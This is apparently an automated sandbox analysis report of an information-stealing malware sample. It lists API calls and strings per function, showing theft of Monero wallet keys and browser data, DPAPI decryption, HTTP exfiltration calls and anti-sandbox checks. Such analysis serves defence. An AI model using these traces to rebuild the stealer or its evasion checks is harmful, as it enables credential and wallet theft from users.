                              • Instruction Fuzzy Hash: 33311AB0A0020CAADB14FBE4D856BFE7738EF04340F558528F746A6585DFB46A05CBB6

                              Control-flow Graph (rendered graph for the function at 00DF6ABA not reproduced; legend: Executed / Not Executed)
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00DF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00DF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,019789F0,?,00E0110C,?,00000000,?,00E01110,?,00000000,00E00AEF), ref: 00DF6B1A
                              • ExitProcess.KERNEL32 ref: 00DF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                              • Instruction ID: 3e0108aea8969ebf7f9e2e3e0620b6b33698e1c4fecdb1dcbe119ef16b602b5b
                              • Opcode Fuzzy Hash: 156f17488948e83f23429fa38d0a442716a49feed983da466a42606560be1e4e
                              • Instruction Fuzzy Hash: 2BF03A70A4020DEEE720AFA09C0ABBD7A34FB04701F25C514FB47A2985CBB59540DA75

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: fa76210ef3c79b22c2eafe147e8468d791ccd4be4965e6da313807ee2ff3baad
                              • Instruction ID: d1546075fb7cafd55be47d547193d9fd5680105ec917cece10753845230615cc
                              • Opcode Fuzzy Hash: fa76210ef3c79b22c2eafe147e8468d791ccd4be4965e6da313807ee2ff3baad
                              • Instruction Fuzzy Hash: 16215EB1D00209ABDF10DFA5EC49ADE7B74FB04320F108625FA15A7281EB706A09CB91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE6280: InternetOpenA.WININET(00E00DFE,00000001,00000000,00000000,00000000), ref: 00DE62E1
                                • Part of subcall function 00DE6280: StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6303
                                • Part of subcall function 00DE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE6335
                                • Part of subcall function 00DE6280: HttpOpenRequestA.WININET(00000000,GET,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE6385
                                • Part of subcall function 00DE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DE63BF
                                • Part of subcall function 00DE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DF5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                              • Instruction ID: 8299f482215c091760ec78914c1c55964bc9f5ce4960a9e24ec80778791d32ef
                              • Opcode Fuzzy Hash: 11fa6535237faafe645e9c73abaf81ddd6c0f5b547c04f95f826be6b58b38728
                              • Instruction Fuzzy Hash: 69110AB090014CAACB14FF68D952AFD7338EF50340F41C158FA0E5A596EF70AB0AC6B1

                              Control-flow Graph (rendered graph for the function at 00DE1220 not reproduced; legend: Executed / Not Executed)
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DE123E
                              • ExitProcess.KERNEL32 ref: 00DE1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DE112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DE1132
                              • ExitProcess.KERNEL32 ref: 00DE1143
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DE10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DE10F7
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              APIs
                                • Part of subcall function 00DF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                                • Part of subcall function 00DF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                                • Part of subcall function 00DF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                                • Part of subcall function 00DF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                                • Part of subcall function 00DF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                                • Part of subcall function 00DF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                              • ExitProcess.KERNEL32 ref: 00DE11C6
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              APIs
                              • wsprintfA.USER32 ref: 00DF38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF38E3
                              • lstrcat.KERNEL32(?,?), ref: 00DF3935
                              • StrCmpCA.SHLWAPI(?,00E00F70), ref: 00DF3947
                              • StrCmpCA.SHLWAPI(?,00E00F74), ref: 00DF395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF3C67
                              • FindClose.KERNEL32(000000FF), ref: 00DF3C7C
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00E00B32,00E00B2B,00000000,?,?,?,00E013F4,00E00B2A), ref: 00DEBEF5
                              • StrCmpCA.SHLWAPI(?,00E013F8), ref: 00DEBF4D
                              • StrCmpCA.SHLWAPI(?,00E013FC), ref: 00DEBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00DEC7D1
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              APIs
                              • wsprintfA.USER32 ref: 00DF492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                              • StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                              • StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                              • wsprintfA.USER32 ref: 00DF45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                              • StrCmpCA.SHLWAPI(?,00E00FC4), ref: 00DF45EB
                              • StrCmpCA.SHLWAPI(?,00E00FC8), ref: 00DF4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF468B
                              • FindClose.KERNEL32(000000FF), ref: 00DF46A0
                              • lstrcat.KERNEL32(?,0197F168), ref: 00DF46C5
                              • lstrcat.KERNEL32(?,0197D130), ref: 00DF46D8
                              • lstrlen.KERNEL32(?), ref: 00DF46E5
                              • lstrlen.KERNEL32(?), ref: 00DF46F6
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              APIs
                              • wsprintfA.USER32 ref: 00DF3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF3EDA
                              • StrCmpCA.SHLWAPI(?,00E00FAC), ref: 00DF3F08
                              • StrCmpCA.SHLWAPI(?,00E00FB0), ref: 00DF3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF406C
                              • FindClose.KERNEL32(000000FF), ref: 00DF4081
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              APIs
                              • wsprintfA.USER32 ref: 00DEED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DEED55
                              • StrCmpCA.SHLWAPI(?,00E01538), ref: 00DEEDAB
                              • StrCmpCA.SHLWAPI(?,00E0153C), ref: 00DEEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00DEF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                              • Instruction ID: 71b2db4655cba358bf1d4ebcbb55f5ba147223b21216aa91ceb102cf5cd7107e
                              • Opcode Fuzzy Hash: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                              • Instruction Fuzzy Hash: CFE10FB191111C9ADB24FB64CC52EFE7338EF54340F4581A9B60E66096EE706B8ACF71
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                              • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                              • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                              • Instruction ID: b4b45876fc47bef5d8aad456dfd2339c5e6b95d1847a2a80951bbe4b2c223884
                              • Opcode Fuzzy Hash: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                              • Instruction Fuzzy Hash: A2B131B19001189BCB24FF64DC95AFD7379EF54300F41C1A8A50E9A185EE706B49CBB1
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E0510C,?,?,?,00E051B4,?,?,00000000,?,00000000), ref: 00DE1923
                              • StrCmpCA.SHLWAPI(?,00E0525C), ref: 00DE1973
                              • StrCmpCA.SHLWAPI(?,00E05304), ref: 00DE1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DE1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00DE1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DE1E20
                              • FindClose.KERNEL32(000000FF), ref: 00DE1E32
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                              • Instruction ID: c46180d4676962ebe346c86c4c92947ff804344e076e73af1ef532fc7e9f4c6d
                              • Opcode Fuzzy Hash: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                              • Instruction Fuzzy Hash: 5612FBB191011C9ACB15FB64CC96AFE7378EF54340F4581A9A60E66091EF706F89CFB1
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E00C2E), ref: 00DEDE5E
                              • StrCmpCA.SHLWAPI(?,00E014C8), ref: 00DEDEAE
                              • StrCmpCA.SHLWAPI(?,00E014CC), ref: 00DEDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00DEE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                              • Instruction ID: 776fec258f9195a11cb7f4d3ecbbe8e61c86cc9f27cef1966d55fcdfef305382
                              • Opcode Fuzzy Hash: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                              • Instruction Fuzzy Hash: 03F1CEB191012C9ACB25FB64CC95AFE7338EF14340F8581E9A50E66095EF706B89CF71
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E014B0,00E00C2A), ref: 00DEDAEB
                              • StrCmpCA.SHLWAPI(?,00E014B4), ref: 00DEDB33
                              • StrCmpCA.SHLWAPI(?,00E014B8), ref: 00DEDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00DEDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                              • Instruction ID: ed6aa1e9f34d9809eb4dc882e21a7f5dad8716b5b7646231b2bfd773e1a64d4e
                              • Opcode Fuzzy Hash: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                              • Instruction Fuzzy Hash: E19130B2A0020897CB14FB74DC969FD737DEF84340F41C568F95A96185EE74AB098BB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7ys|$CCk~$FCb$Z^Wm$nmmw$qEt$7}$?e
                              • API String ID: 0-791327716
                              • Opcode ID: 0c4eb566d9e3aa06898df657b0d8f6aedf91c9d9464b1b3cc9e9e77677731155
                              • Instruction ID: 9883fe80a71cefc74388d2fb26f2a73dc7196e6682d4bd575437a7cdc81fd083
                              • Opcode Fuzzy Hash: 0c4eb566d9e3aa06898df657b0d8f6aedf91c9d9464b1b3cc9e9e77677731155
                              • Instruction Fuzzy Hash: 87B206F360C6049FE3046E29EC8567ABBE5EF94320F1A493DE6C4C3744EA3598458797
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00E005AF), ref: 00DF7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DF7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00DF7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00DF7C62
                              • LocalFree.KERNEL32(00000000), ref: 00DF7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                              • Instruction ID: 5ff2c62651b2ca0c4b25a15d98b4051dc65737e443f8cb79dc67fbd5bd35ae9b
                              • Opcode Fuzzy Hash: b85ac848b95977d513241d4f7451bcadcf875c15a970c6b14db788865b816ff8
                              • Instruction Fuzzy Hash: 994107B194021CABDB24DB94DC99BFEB378EB48700F608199E60966181DB746B85CFB1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: `?$17o$F*-$La;s$V~|w$oQz{$'w
                              • API String ID: 0-735723939
                              • Opcode ID: 567f0003459ef02064d192024c3a443fe9a54b48af84db0cc2e4d20c8aa98484
                              • Instruction ID: 25a8084af53eba45225e9d8f1c0c307c4b83a359f271079635c78239beefd961
                              • Opcode Fuzzy Hash: 567f0003459ef02064d192024c3a443fe9a54b48af84db0cc2e4d20c8aa98484
                              • Instruction Fuzzy Hash: ADB2F9F3A082149FE304AE2DEC8567ABBE9EFD4720F16493DEAC4C3744E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %pwO$<:{=$n,m$z,^$zxg-$~Nuy$kt?
                              • API String ID: 0-1752472852
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !k~k$#2_{$>a.}$^6~s$`_{$j8($:y=
                              • API String ID: 0-3345155403
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E00D73), ref: 00DEE4A2
                              • StrCmpCA.SHLWAPI(?,00E014F8), ref: 00DEE4F2
                              • StrCmpCA.SHLWAPI(?,00E014FC), ref: 00DEE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !i_8$3/e*$7,=$:!?$W<7z$[Ljk
                              • API String ID: 0-1638412300
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O?=$c=w}$kc{~$kc{~$rv$|A;
                              • API String ID: 0-525553454
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /!ow$23mK$48`$kO~{$]6
                              • API String ID: 0-1159922982
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00DEC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00DEC87C
                              • lstrcat.KERNEL32(?,00E00B46), ref: 00DEC943
                              • lstrcat.KERNEL32(?,00E00B47), ref: 00DEC957
                              • lstrcat.KERNEL32(?,00E00B4E), ref: 00DEC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00DE724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DE7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DE72A4
                              • LocalFree.KERNEL32(?), ref: 00DE72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DF961E
                              • Process32First.KERNEL32(00E00ACA,00000128), ref: 00DF9632
                              • Process32Next.KERNEL32(00E00ACA,00000128), ref: 00DF9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00DF965C
                              • CloseHandle.KERNEL32(00E00ACA), ref: 00DF967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: :]sn$<wy$=fy$4w
                              • API String ID: 0-2043813047
                              Strings
                              Memory Dump Source
